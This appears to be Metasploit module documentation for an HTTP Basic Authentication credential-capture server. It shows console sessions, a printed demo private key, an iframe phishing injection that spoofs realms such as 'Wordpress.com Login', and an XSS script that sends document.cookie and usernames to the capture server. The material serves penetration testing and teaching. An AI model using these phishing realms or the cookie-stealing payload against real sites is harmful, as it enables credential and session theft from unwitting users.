HTTP Client Basic Authentication Credential Collector - Metasploit

msf > use auxiliary/server/capture/http_basic
msf auxiliary(http_basic) > exploit

This module creates a mock web server which, utilizing a HTTP 401 response, prompts the user to enter credentials for Basic Authentication.

Verification Steps

---

1. Start msfconsole
2. Do: use auxiliary/server/capture/http_basic
3. Do: run

Options

---

REALM

The Realm for the Basic Authentication, which may be displayed in the input box to the user. Default is Secure Site. Some notable Realms to emulate:

• level_15 or view_access
• cPanel
• HuaweiHomeGateway
• Broadband Router

RedirectURL

After the user enters a set of credentials, their browser will be redirected to this address. Default is ``.

SSL

Boolean if SSL should be used, making this HTTPS. HTTPS is typically run on port 443. If SSLCert is not set, a certificate will be automatically generated. Default is False.

SSLCert

File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically generated. Default is ``.

URIPATH

What URI should be utilized to prompt for the Basic Authentication. For instance, you may want this to run on /cisco if you use the REALM level_15 or view_access. Default is ``, which will randomly generate a URIPATH.

Scenarios

---

Cisco Emulator with wget Client

Server:

msf5 > use auxiliary/server/capture/http_basic 
msf5 auxiliary(server/capture/http_basic) > set REALM "level_15 or view_access"
REALM => level_15 or view_access
msf5 auxiliary(server/capture/http_basic) > set uripath '/cisco'
uripath => /cisco
msf5 auxiliary(server/capture/http_basic) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/http_basic) > 
[*] Using URL: http://0.0.0.0:80/cisco
[*] Local IP: http://10.1.1.1:80/cisco
[*] Server started.
[*] Sending 401 to client 127.0.0.1
[+] 127.0.0.1 - Credential collected: "cisco:cisco" => /cisco

Client:

root@kali:~# wget http://cisco:[email protected]:80/cisco
--2018-11-05 19:44:29--  http://cisco:*password*@127.0.0.1/cisco
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response... 401 Unauthorized
Authentication selected: Basic realm="level_15 or view_access"
Reusing existing connection to 127.0.0.1:80.
HTTP request sent, awaiting response... 404 Not Found
2018-11-05 19:44:29 ERROR 404: Not Found.

HTTPS with Self-Signed Certificate and curl Client

Server:

msf5 > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
[*] exec: openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem

Generating a RSA private key
............+++++
.+++++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
msf5 > cat key.pem certificate.pem > selfsigned.pem
[*] exec: cat key.pem certificate.pem > selfsigned.pem

msf5 > cat /root/metasploit-framework/selfsigned.pem
[*] exec: cat /root/metasploit-framework/selfsigned.pem

-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCmniuSmx1h57hK
XxBCfCOfsfJatMEtsrTHFCC0GDvIIHGot8oniVKes7yK0w8GSr0LeJgH23QMf/N0
SZlF6BRc0GELAC7qPa9VJ8HPYYVbO/VaqXMy83y7YuSh6QlP/DksHt0W0rfvcM36
ypHiZ3LIbaz8VuAUyIU5Qa6G+TNvwClhQnaX3TLN0kk31pAwwuSRNvSYvmUih4HA
eN29IJyoiXH+GEjw7wBbm9dkbU1DI71zSZyO/Tfi/2SwDwaTKCucW7tUEd9ey6AU
5hB6jGpc9N7rMYqV82mLogsXGaRDWh/tt9hghGWAX3MfD7EebQqYr4vQssoisU62
ct4DtCrNAgMBAAECggEAJ8ZohnYLHJ0xjGeHPSffZTcYsPiniR45M7ElYXjLhKni
GDHPy4Jnu8UShF2AH7Nlz8A5It8LpBRDbQZI1bxiaAnCsNqZWIfjPEPia3xPVolI
uBztiENCCoXAKLq142dFyrePdexVxo46Td1f2Blz+E7eVdrzYWLBEvsQC96fndRx
8j6KT17tIhGz+9+87dwVUXiiBZTzeWRf94jofek3XWADlu6QjAd3qW944ljYyB7p
+cJGwod5xFUxRdAr12RN+VIuzyP6xUXkfBQImdT3E0nR8LWwb4FcjwrCtCNEEYqU
/CEBx8rm0qt7mBLiIjTq5+clfKKbd1XOXmGn7+7A7QKBgQDdoJl7NBcpBtLMC1kY
KK78kar+nWS5am9H/3o76+sRmQGOCjRg9TyQBmqGkxb7en/m/xZzmS0QxbLCbChj
nOgFn9owQKQ4a2FPiNHQ1BQ7F44E+B4j+1auS7VnpbzhPgyOwmZcDoRn5h+FeNwW
Xma/o+a78rp53eTzG9Hy8lFMwwKBgQDAdX8h8Us1d34a/GuFljUBe5iJNo1giqgq
X8R2BCshvQWoT2wz3YX4FRBKMZKdfwLfbRxK1bzW7BinpgoNR6NV0lor75BgQiCJ
nztUMCfDAkxwCgXZjR20OS106G/SRjRgLtYkdDhmfynyy2MSAKhmVaLxBa57VlXD
ZE2G4jdxLwKBgQCu1oReGnDu77AaQhWOJoItQ+lmpdoRH/McFGJkpS+zmUYNvOUn
XC/j2vvsoFswFqqSG8ild0CDC8OC93pBY0XzMfEZwdULoUKKUQBcwwIWv/VM3ERC
1IPESnuYgbpo4t9bO+cuVlGD+ZoCXJ8bkmtyYaWjvc/4VeHJG7hb9WfHqwKBgAe5
L17nVgNRRkhC9PWpb3sdwKNRAx9qsRDyQuoRhMGX2lBEz6zNKQEppzuy/ZVAcZcR
w97k8O0XEG455ZFe3JknFeNJe9vBC5k6QKFCRXY382VToaR3W0fOO5rDcSlZE+UA
PCu+Vj0WwVIzA0jHqfphWWaeub/NWSe8MLhG/76VAoGBALTnftXB/b45xkgNEIZ3
7WOsfvGo23tlXSQdCNNOn6YKptqYX88jeihcKEvGoIBH+LfV/GfD2P1d227kHyBZ
FoZ+2dUwVXO2UP5j3WlxBleOqk0rTbIri/Pj4oCajAR4pXDIviUD+bUFojyFaysj
It3LYabipjgG3NjDxYBMyJnt
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIDazCCAlOgAwIBAgIUXlRMetgIkrPIiamQGIBKbcEuT1IwDQYJKoZIhvcNAQEL
BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0xODExMDYwMDQ2NDFaFw0xOTEx
MDYwMDQ2NDFaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw
HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB
AQUAA4IBDwAwggEKAoIBAQCmniuSmx1h57hKXxBCfCOfsfJatMEtsrTHFCC0GDvI
IHGot8oniVKes7yK0w8GSr0LeJgH23QMf/N0SZlF6BRc0GELAC7qPa9VJ8HPYYVb
O/VaqXMy83y7YuSh6QlP/DksHt0W0rfvcM36ypHiZ3LIbaz8VuAUyIU5Qa6G+TNv
wClhQnaX3TLN0kk31pAwwuSRNvSYvmUih4HAeN29IJyoiXH+GEjw7wBbm9dkbU1D
I71zSZyO/Tfi/2SwDwaTKCucW7tUEd9ey6AU5hB6jGpc9N7rMYqV82mLogsXGaRD
Wh/tt9hghGWAX3MfD7EebQqYr4vQssoisU62ct4DtCrNAgMBAAGjUzBRMB0GA1Ud
DgQWBBR+MfL8LopA4OaIRLGK1gof3u+PIDAfBgNVHSMEGDAWgBR+MfL8LopA4OaI
RLGK1gof3u+PIDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQBe
IGmZr3wlO32b25qj/4qB7ewukwF6uaS4OQh4VLlUk8uYsqoGfvehAaNNJsu1oKO5
XpShHeyEkpwzgx0mdCmQSB3JKseFYuZTgP9GP00EXuHYl2V+quPFN17fq0AgYN6K
TFDwzYbhWyFGz7k++i23w0/dwvL2dLH+bgdHYU49rhlZIAu7PgbyIuhP+M2ltcjt
NDO8po38u2ba52E56abfg0ZlFBqsua2s1TPHIyQ9iovTPMg1E5UTTGebaN6/BaMh
Oj6N43ld9EONST6BhP3v1buoWHi1FMouocrUkUDuahiHoLlK4ERSUrb4uNnwko24
WdNCCmA8APA1qf2BYVqs
-----END CERTIFICATE-----
msf5 > use auxiliary/server/capture/http_basic 
msf5 auxiliary(server/capture/http_basic) > set ssl true
ssl => true
msf5 auxiliary(server/capture/http_basic) > set srvport 443
srvport => 443
msf5 auxiliary(server/capture/http_basic) > set sslcert /root/metasploit-framework/selfsigned.pem
sslcert => /root/metasploit-framework/selfsigned.pem
msf5 auxiliary(server/capture/http_basic) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/http_basic) > 
[*] Using URL: https://0.0.0.0:443/4w0tML
[*] Local IP: https://192.168.2.117:443/4w0tML
[*] Server started.
[+] 127.0.0.1 - Credential collected: "admin:password123" => /4w0tML

Clients:

root@kali:~# curl -k --user admin:password123 https://127.0.0.1/4w0tML
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.2.9 (Unix) Server at  Port 443</address>
</body></html>

HTML Injection Social Engineering

In this scenario, we're able to inject HTML (but not script) into a website. We'll inject an iframe that will load our basic authentication website. This payload will pop-up a login box, with the REALM (title) set to the website, which will hopefully trick a user into entering their credentials. The following scenario is a demonstration, no actual vulnerability was identified, or tested. The HTML was simply edited in the local browser.

HTML Payload Injected:

<iframe width="0" height="0" src="http://127.0.0.1/"></iframe>

Server:

msf5 > use auxiliary/server/capture/http_basic 
msf5 auxiliary(server/capture/http_basic) > set uripath '/'
uripath => /
msf5 auxiliary(server/capture/http_basic) > set REALM "Wordpress.com Login"
REALM => Wordpress.com Login
msf5 auxiliary(server/capture/http_basic) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/http_basic) > 
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.2.117:80/
[*] Server started.
[*] Sending 401 to client 127.0.0.1
[+] 127.0.0.1 - Credential collected: "metasploit_blog:ms08-0sK1NG!" => /

Client:

XSS Cookie Theft

In this scenario, we're able to inject JavaScript into a website. We'll first get the user's cookie, then with jQuery pull the username from the username field. Because the cookie may contain fields break URI parsing (like @) we use btoa to base64 encode the cookie. Next we'll write an iframe that will silently attempt a login to our basic authentication website. The following scenario is a demonstration, no actual vulnerability was identified, or tested. The HTML was simply edited in the local browser.

Payload:

<script>
var cookie = document.cookie;
var username = $('#username').text();
document.write('<iframe width="0" height="0" src="http://' + username + ':' + btoa(cookie) + '@127.0.0.1/"></iframe>');
</script>

Sever:

msf5 > use auxiliary/server/capture/http_basic 
msf5 auxiliary(server/capture/http_basic) > set uripath '/'
uripath => /
msf5 auxiliary(server/capture/http_basic) > set REALM "Login"
REALM => Login
msf5 auxiliary(server/capture/http_basic) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/http_basic) > 
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.2.117:80/
[*] Server started.
[*] Sending 401 to client 127.0.0.1
[+] 127.0.0.1 - Credential collected: "h00die:R1VDPUFRRUJBUUZicVNGY2owSWVBQVJuJnM9QVFBQUFFUmFpakN4Jmc9VzZmYkdROyB1Y3M9bG5jdD0xNTM3NzI3MjQ4OyBjbXA9dD0xNTQxNDY4ODQ1Jmo9MDsgZmxhc2hfZW5hYmxlZD0wOyBhcGVhZj10ZC1hcHBsZXQtc3RyZWFtPSU3QiUyMnRtcGwlMjIlM0ElMjJpdGVtcyUyMiUyQyUyMmx2JTIyJTNBMTU0MTQ3MDY0NjI4OCU3RDsgSFA9MTsgQj1jN2tvYTYxZDY5dHBzJmI9MyZzPTVy" => /

Decoding the cookie:

msf5 auxiliary(server/capture/http_basic) > irb
[*] Starting IRB shell...
[*] You are in auxiliary/server/capture/http_basic

>> Base64.decode64('R1VDPUFRRUJBUUZicVNGY2owSWVBQVJuJnM9QVFBQUFFUmFpakN4Jmc9VzZmYkdROyB1Y3M9bG5jdD0xNTM3NzI3MjQ4OyBjbXA9dD0xNTQxNDY4ODQ1Jmo9MDsgZmxhc2hfZW5hYmxlZD0wOyBhcGVhZj10ZC1hcHBsZXQtc3RyZWFtPSU3QiUyMnRtcGwlMjIlM0ElMjJpdGVtcyUyMiUyQyUyMmx2JTIyJTNBMTU0MTQ3MDY0NjI4OCU3RDsgSFA9MTsgQj1jN2tvYTYxZDY5dHBzJmI9MyZzPTVy')
=> "GUC=AQEBAAFbqSFcj0IeBARn&s=AQADAERaieCx&g=W2fb9Q; ucs=lnct=1537714242; cmp=t=1247468145&j=0; flash_enabled=0; apeaf=td-applet-stream=%7B%22tmpl%22%3A%22items%22%2C%22lv%22%3A1541470698788%7D; HP=1; B=c7koa55d69tbs&b=3&s=5r"

msf6 > use auxiliary/server/capture/http_basic

msf6 auxiliary(server/capture/http_basic) > show info

       Name: HTTP Client Basic Authentication Credential Collector
     Module: auxiliary/server/capture/http_basic
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  saint patrick <[email protected]>

Available actions:
  Name     Description
  ----     -----------
  Capture  Run capture web server

Check supported:
  No

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  REALM        Secure Site      yes       The authentication realm you'd like to present.
  RedirectURL                   no        The page to redirect users to after they enter basic auth creds
  SRVHOST      0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT      80               yes       The local port to listen on.
  SSL          false            no        Negotiate SSL for incoming connections
  SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                       no        The URI to use for this exploit (default is random)

Description:
  This module responds to all requests for resources with a HTTP 401. 
  This should cause most browsers to prompt for a credential. If the 
  user enters Basic Auth creds they are sent to the console. This may 
  be helpful in some phishing expeditions where it is possible to 
  embed a resource into a page. This attack is discussed in Chapter 3 
  of The Tangled Web by Michal Zalewski.

msf6 auxiliary(server/capture/http_basic) > show options

Module options (auxiliary/server/capture/http_basic):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   REALM        Secure Site      yes       The authentication realm you'd like to present.
   RedirectURL                   no        The page to redirect users to after they enter basic auth creds
   SRVHOST      0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT      80               yes       The local port to listen on.
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                       no        The URI to use for this exploit (default is random)

Auxiliary action:

   Name     Description
   ----     -----------
   Capture  Run capture web server

msf6 auxiliary(server/capture/http_basic) > show advanced

Module advanced options (auxiliary/server/capture/http_basic):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   ListenerComm                     no        The specific communication channel to use for this service
   SSLCipher                        no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression  false            no        Enable SSL/TLS-level compression
   SendRobots      false            no        Return a robots.txt file if asked for one
   URIHOST                          no        Host to use in URI (useful for tunnels)
   URIPORT                          no        Port to use in URI (useful for tunnels)
   VERBOSE         false            no        Enable detailed status messages
   WORKSPACE                        no        Specify the workspace for this module

msf6 auxiliary(server/capture/http_basic) > show actions

Auxiliary actions:

   Name     Description
   ----     -----------
   Capture  Run capture web server

msf6 auxiliary(server/capture/http_basic) > show evasion

Module evasion options:

   Name                      Current Setting  Required  Description
   ----                      ---------------  --------  -----------
   HTML::base64              none             no        Enable HTML obfuscation via an embeded base64 html object (IE not supported) (Accepted: none, plain, single_pad, double_pad, random_space_injection)
   HTML::javascript::escape  0                no        Enable HTML obfuscation via HTML escaping (number of iterations)
   HTML::unicode             none             no        Enable HTTP obfuscation via unicode (Accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
   HTTP::chunked             false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression         none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding      false            no        Enable folding of HTTP headers
   HTTP::junk_headers        false            no        Enable insertion of random junk HTTP headers
   HTTP::no_cache            false            no        Disallow the browser to cache HTTP content
   HTTP::server_name         Apache           yes       Configures the Server header of all outgoing replies
   TCP::max_send_size        0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay           0                no        Delays inserted before every send.  (0 = disable)